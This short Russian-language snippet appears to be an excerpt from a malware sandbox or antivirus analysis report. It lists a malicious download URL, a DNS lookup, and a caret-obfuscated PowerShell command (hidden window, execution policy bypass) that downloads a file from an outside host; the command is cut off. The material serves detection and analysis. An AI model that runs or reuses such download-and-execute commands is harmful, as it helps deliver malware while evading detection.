Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^W^E^RSHeLl.E^Xe ^-EXeCU^T^iONPOlICY ^bYP^AsS ^-N^O^pRoFiL^e -win^DowSt^Yle hIdd^EN (n^EW-^O^bje^c^T^ sYSte^m.n^e^T.wE^B^Cli^eNt).^DOW^n^L^oA^df^Il^E^('http://zonexxopera...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "pO^W^E^RSHeLl.E^Xe ^-EXeCU^T^iONPOlICY ^bYP^AsS ^-N^O^pRoFiL^e -win^DowSt^Yle hIdd^EN (n^EW-^O^bje^c^T^ sYSte^m.n^e^T.wE^B^Cli^eNt).^DOW^n^L^oA^df^Il^E^('http://zonexxopera...' (со скрытым окном)